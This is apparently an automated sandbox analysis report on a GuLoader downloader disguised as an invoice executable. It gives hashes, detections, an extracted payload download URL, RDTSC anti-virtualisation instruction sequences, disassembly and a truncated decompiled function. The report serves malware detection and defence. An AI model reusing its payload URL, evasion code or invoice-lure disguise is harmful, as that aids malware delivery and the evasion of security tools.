Play interactive tour

Edit tour

Windows Analysis Report FAKTURA 9502461485.exe

Overview

General Information

Sample Name:	FAKTURA 9502461485.exe
Analysis ID:	530352
MD5:	34ae2e779e3b63f6450aacbaa6b5ab1d
SHA1:	0f7dc13bf5871f3ba281e064776371520b65bdd9
SHA256:	5bf5fa8d817fb2902dc28de115286e963b6dd4f5940d00e017b9944172972b25
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

Sample file is different than original file name gathered from version info

PE file contains strange resources

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

FAKTURA 9502461485.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\FAKTURA 9502461485.exe" MD5: 34AE2E779E3B63F6450AACBAA6B5AB1D)

conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1xfUz"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1191692194.00000000022B0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.1191692194.00000000022B0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1xfUz"}

Multi AV Scanner detection for submitted file

Show sources

Source: FAKTURA 9502461485.exe

ReversingLabs: Detection: 26%

Source: FAKTURA 9502461485.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=1xfUz

Source: FAKTURA 9502461485.exe, 00000000.00000002.1191484117.000000000070A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: FAKTURA 9502461485.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: FAKTURA 9502461485.exe, 00000000.00000000.664593381.0000000000424000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameAfterpains9.exe vs FAKTURA 9502461485.exe
Source: FAKTURA 9502461485.exe, 00000000.00000002.1191798592.0000000002380000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAfterpains9.exeFE2X vs FAKTURA 9502461485.exe
Source: FAKTURA 9502461485.exe	Binary or memory string: OriginalFilenameAfterpains9.exe vs FAKTURA 9502461485.exe

Source: FAKTURA 9502461485.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Code function: 0_2_022C6B79	0_2_022C6B79
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Code function: 0_2_022BDC30	0_2_022BDC30
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Code function: 0_2_022C3719	0_2_022C3719
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Code function: 0_2_022C4BA5	0_2_022C4BA5
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Code function: 0_2_022C4413	0_2_022C4413

Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe

Code function: 0_2_022BDC30 NtAllocateVirtualMemory,

0_2_022BDC30

Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe

Process Stats: CPU usage > 98%

Source: FAKTURA 9502461485.exe

ReversingLabs: Detection: 26%

Source: FAKTURA 9502461485.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FAKTURA 9502461485.exe "C:\Users\user\Desktop\FAKTURA 9502461485.exe"
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6744:120:WilError_01

Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe

File created: C:\Users\user\AppData\Local\Temp\~DFA25EEA5CBC5E729F.TMP

Jump to behavior

Source: classification engine

Classification label: mal72.troj.evad.winEXE@2/1@0/0

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000000.00000002.1191692194.00000000022B0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Code function: 0_2_00406D41 push ss; retf	0_2_00406D6D
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Code function: 0_2_00409164 push 8069A23Bh; retf	0_2_00409169
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Code function: 0_2_00406B87 push ebp; ret	0_2_00406BBB
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Code function: 0_2_022B235C push ebx; ret	0_2_022B235E
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Code function: 0_2_022B17DD pushfd ; retf	0_2_022B17E7
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Code function: 0_2_022B594E push ecx; iretd	0_2_022B5978

Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe

RDTSC instruction interceptor: First address: 00000000022BCC99 second address: 00000000022BCC99 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 5DB00295h 0x00000007 xor eax, DFA6B599h 0x0000000c xor eax, 58BD59D9h 0x00000011 sub eax, DAABEED4h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F1FC084C9C8h 0x0000001e lfence 0x00000021 mov edx, F98EF895h 0x00000026 xor edx, 7569717Eh 0x0000002c add edx, 1104375Ah 0x00000032 xor edx, E215C151h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d ret 0x0000003e sub edx, esi 0x00000040 ret 0x00000041 pop ecx 0x00000042 add edi, edx 0x00000044 dec ecx 0x00000045 mov dword ptr [ebp+000001F1h], DD8CFFEBh 0x0000004f xor dword ptr [ebp+000001F1h], 1BBB3DA6h 0x00000059 xor dword ptr [ebp+000001F1h], A8C93992h 0x00000063 jmp 00007F1FC084CA99h 0x00000068 cmp cx, bx 0x0000006b sub dword ptr [ebp+000001F1h], 6EFEFBDFh 0x00000075 cmp ecx, dword ptr [ebp+000001F1h] 0x0000007b jne 00007F1FC084C891h 0x00000081 cmp esi, 739A0701h 0x00000087 mov dword ptr [ebp+00000205h], edx 0x0000008d test cx, ax 0x00000090 mov edx, ecx 0x00000092 push edx 0x00000093 mov edx, dword ptr [ebp+00000205h] 0x00000099 cmp ax, 00002609h 0x0000009d call 00007F1FC084CB1Bh 0x000000a2 call 00007F1FC084C9E9h 0x000000a7 lfence 0x000000aa mov edx, F98EF895h 0x000000af xor edx, 7569717Eh 0x000000b5 add edx, 1104375Ah 0x000000bb xor edx, E215C151h 0x000000c1 mov edx, dword ptr [edx] 0x000000c3 lfence 0x000000c6 ret 0x000000c7 mov esi, edx 0x000000c9 pushad 0x000000ca rdtsc

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Code function: 0_2_022C334E mov eax, dword ptr fs:[00000030h]		0_2_022C334E
Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe	Code function: 0_2_022C2989 mov eax, dword ptr fs:[00000030h]		0_2_022C2989

Source: C:\Users\user\Desktop\FAKTURA 9502461485.exe

Code function: 0_2_022C6B79 RtlAddVectoredExceptionHandler,

0_2_022C6B79

Source: FAKTURA 9502461485.exe, 00000000.00000002.1191549522.0000000000D90000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: FAKTURA 9502461485.exe, 00000000.00000002.1191549522.0000000000D90000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: FAKTURA 9502461485.exe, 00000000.00000002.1191549522.0000000000D90000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: FAKTURA 9502461485.exe, 00000000.00000002.1191549522.0000000000D90000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection2	Process Injection2	Input Capture1	Security Software Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information1	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	System Information Discovery11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
FAKTURA 9502461485.exe	27%	ReversingLabs	Win32.Worm.GenericML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	530352
Start date:	29.11.2021
Start time:	14:11:07
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	FAKTURA 9502461485.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.troj.evad.winEXE@2/1@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 49.7% (good quality ratio 27.3%) Quality average: 35.3% Quality standard deviation: 37.5%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 51.104.136.2, 40.127.240.158, 20.49.150.241 Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, settingsfd-geo.trafficmanager.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DFA25EEA5CBC5E729F.TMP Download File
Process:	C:\Users\user\Desktop\FAKTURA 9502461485.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	1.9866006611106688
Encrypted:	false
SSDEEP:	96:jWpahLKAycVxc4LlvnffSIPW0wLzzj1ylDHn3Rs:KMhLKCxV5vnffI0wIdHBs
MD5:	A256BBA112F7FA34FE9E19ED07D0DF83
SHA1:	3E86ADD7C0890C55E8F22334A3E26134D7AB1EE8
SHA-256:	AB9F6744C55428A62F4696BC1779409A30420D0983EDD5536A0D280DF5EE7FE0
SHA-512:	9E762DFE82611778602E8BF19439E48AF7278D3D9399FF44666EB8A196206F4B1B50B9B623710B138BD7A7E9C1E0A05BE85CE6FB7B0F208C9664669297C416EA
Malicious:	false
Reputation:	low
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.029637622456598
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FAKTURA 9502461485.exe
File size:	155648
MD5:	34ae2e779e3b63f6450aacbaa6b5ab1d
SHA1:	0f7dc13bf5871f3ba281e064776371520b65bdd9
SHA256:	5bf5fa8d817fb2902dc28de115286e963b6dd4f5940d00e017b9944172972b25
SHA512:	e3e4091f41e56ab35f0be0fda28f7bd569b4ec3a9f513cfba7423eff71ac206563801103ec0ef15f8e3279578d45e2038d66861196f6c1d731929873a8ecfa48
SSDEEP:	1536:6sfJffaX1bYawjWTQGfLZDLmC30X5TnzlN26x64XhVfJffpfJff:bfJffqYiQuDLmCunzlFhVfJffpfJff
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L......V.....................P............... ....@................

File Icon


Icon Hash:	70ecccaececc71e2

Static PE Info

General
Entrypoint:	0x4015a8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x56A09498 [Thu Jan 21 08:19:36 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	458ac857eb15a6ebaad7748f2f663dae

Entrypoint Preview

Instruction
push 00402DDCh
call 00007F1FC0B1F075h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
dec eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi+40A213C6h], al
fldenv [ebx+360FB946h]
add dword ptr [ebx+0019CD89h], esp
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [ecx+6Fh], ch
outsb
and byte ptr [726F6620h], bh
insb
popad
jnc 00007F1FC0B1F0F5h
popad
imul esi, dword ptr [edx+esi*2+65h], 72h
add byte ptr [eax], ah
and byte ptr [ebx+6Ch], al
imul esp, dword ptr [ebp+6Eh], 00000000h
dec esp
xor dword ptr [eax], eax
add eax, 75BE3F12h
mov ch, D7h
mov bl, 48h
lodsd
daa
wait
arpl word ptr [ebx+edx*4+22548EA1h], bp
mov bh, CCh
add eax, B2401A9Ah
mov seg?, word ptr [ecx+edi-5Dh]
jo 00007F1FC0B1F02Ch
pop edx
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
jp 00007F1FC0B1F098h
add byte ptr [eax], al
xchg eax, edx
adc eax, 0B000000h
add byte ptr [edx+6Eh], ah
jnc 00007F1FC0B1F0EFh
imul ebp, dword ptr [esi+67h], 00736E65h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x21784	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x2f34	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x194	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x20d58	0x21000	False	0.360011245265	data	5.1903509422	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x22000	0x1250	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x2f34	0x3000	False	0.232340494792	data	4.20527594126	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x2599a	0x1542	data	English	United States
RT_ICON	0x248f2	0x10a8	data
RT_ICON	0x2448a	0x468	GLS_BINARY_LSB_FIRST
RT_STRING	0x26edc	0x58	data	English	United States
RT_GROUP_ICON	0x24468	0x22	data
RT_VERSION	0x241c0	0x2a8	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

__vbaVarTstGt, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaVarIdiv, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, __vbaAryConstruct2, __vbaPrintObj, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaUbound, _CIlog, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, __vbaAryCopy, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	Corps
InternalName	Afterpains9
FileVersion	1.00
CompanyName	Corps
LegalTrademarks	Corps
ProductName	Corps
ProductVersion	1.00
FileDescription	Corps
OriginalFilename	Afterpains9.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: FAKTURA 9502461485.exe PID: 6644 Parent PID: 5452

General

Start time:	14:12:03
Start date:	29/11/2021
Path:	C:\Users\user\Desktop\FAKTURA 9502461485.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FAKTURA 9502461485.exe"
Imagebase:	0x400000
File size:	155648 bytes
MD5 hash:	34AE2E779E3B63F6450AACBAA6B5AB1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1191692194.00000000022B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 6744 Parent PID: 6644

General

Start time:	14:12:03
Start date:	29/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: FAKTURA 9502461485.exe PID: 6644 Parent PID: 5452 FAKTURA 9502461485.exeCOMMON

Executed Functions

Function 022C6B79, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

OJ$|, xrefs: 022C7568

Memory Dump Source

Source File: 00000000.00000002.1191692194.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: OJ$|
API String ID: 0-929383376
Opcode ID: ff1ee97800916ff89c2249c4acf280821c0f8ad4330fe40e3d6347f4d75b4195
Instruction ID: cb295a838b1e4fa30d369e8b0aa85bc3ede33d23fe5901e396f566152a2f3b84
Opcode Fuzzy Hash: ff1ee97800916ff89c2249c4acf280821c0f8ad4330fe40e3d6347f4d75b4195
Instruction Fuzzy Hash: D871D031624389CFCB799E74C9A87EAB7A5EF58310F61422ECD4A9F659C7346A40CF01

Uniqueness

Uniqueness Score: -1.00%

Function 022BDC30, Relevance: 1.6, APIs: 1, Instructions: 115memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-489E5D63), ref: 022BE01E

Memory Dump Source

Source File: 00000000.00000002.1191692194.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 2aea283fcf2181baff372c83d29efd6addd54d48bc3e464b80a0d4a25cd96e17
Instruction ID: 60422486090b15530dd220dc4bfa1d0f7214e5d6588cb64cf948852e039f0e07
Opcode Fuzzy Hash: 2aea283fcf2181baff372c83d29efd6addd54d48bc3e464b80a0d4a25cd96e17
Instruction Fuzzy Hash: 2941ED79615384CBDB75AF68CD547EE7BE2AF89350F41452EEC8DDB224C3348A408B42

Uniqueness

Uniqueness Score: -1.00%

Function 0041D1A4, Relevance: 344.8, APIs: 180, Strings: 16, Instructions: 1804
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041D1A4(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				char _v8;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v40;
				void* _v44;
				void* _v48;
				short _v52;
				void* _v56;
				void* _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				short _v76;
				void* _v80;
				char _v96;
				char _v100;
				void* _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _v148;
				char _v156;
				char _v172;
				char _v176;
				char* _v184;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				intOrPtr* _v260;
				signed int _v264;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				intOrPtr* _v308;
				signed int _v312;
				signed int _v316;
				intOrPtr* _v320;
				signed int _v324;
				intOrPtr* _v328;
				signed int _v332;
				intOrPtr* _v336;
				signed int _v340;
				intOrPtr* _v344;
				signed int _v348;
				intOrPtr* _v352;
				signed int _v356;
				intOrPtr* _v360;
				signed int _v364;
				intOrPtr* _v368;
				signed int _v372;
				intOrPtr* _v376;
				signed int _v380;
				intOrPtr* _v384;
				signed int _v388;
				intOrPtr* _v392;
				signed int _v396;
				intOrPtr* _v400;
				signed int _v404;
				intOrPtr* _v408;
				signed int _v412;
				signed int _v416;
				intOrPtr* _v420;
				signed int _v424;
				intOrPtr* _v428;
				signed int _v432;
				intOrPtr* _v436;
				signed int _v440;
				signed int _v444;
				intOrPtr* _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				intOrPtr* _v464;
				signed int _v468;
				intOrPtr* _v472;
				signed int _v476;
				intOrPtr* _v480;
				signed int _v484;
				intOrPtr* _v488;
				signed int _v492;
				intOrPtr* _v496;
				signed int _v500;
				signed int _v504;
				intOrPtr* _v508;
				signed int _v512;
				intOrPtr* _v516;
				signed int _v520;
				intOrPtr* _v524;
				signed int _v528;
				intOrPtr* _v532;
				signed int _v536;
				intOrPtr* _v540;
				signed int _v544;
				intOrPtr* _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t894;
				char* _t898;
				char* _t902;
				signed int _t906;
				signed int _t910;
				signed int _t914;
				signed int _t918;
				signed int _t922;
				signed int _t926;
				signed int _t944;
				signed int _t948;
				signed int _t957;
				signed int _t961;
				signed int _t965;
				signed int _t969;
				signed int _t973;
				signed int _t977;
				signed int _t981;
				signed int _t995;
				signed int _t1000;
				signed int _t1004;
				signed int _t1008;
				signed int _t1012;
				signed int _t1028;
				signed int _t1032;
				signed int _t1037;
				signed int _t1041;
				signed int _t1045;
				signed int _t1049;
				signed int _t1068;
				signed int _t1072;
				signed int _t1076;
				signed int _t1080;
				signed int _t1088;
				signed int _t1095;
				signed int _t1099;
				signed int _t1103;
				signed int _t1107;
				signed int _t1112;
				signed int _t1116;
				char* _t1120;
				signed int _t1124;
				char* _t1128;
				signed int _t1141;
				signed int _t1145;
				char* _t1149;
				signed int _t1163;
				signed int _t1167;
				signed int _t1174;
				signed int _t1180;
				char* _t1182;
				signed int _t1186;
				signed int _t1190;
				signed int _t1194;
				signed int _t1198;
				signed int* _t1199;
				char* _t1200;
				signed int _t1211;
				signed int _t1215;
				signed int _t1219;
				signed int _t1223;
				char* _t1224;
				char* _t1225;
				signed int _t1238;
				signed int _t1242;
				signed int _t1256;
				signed int _t1260;
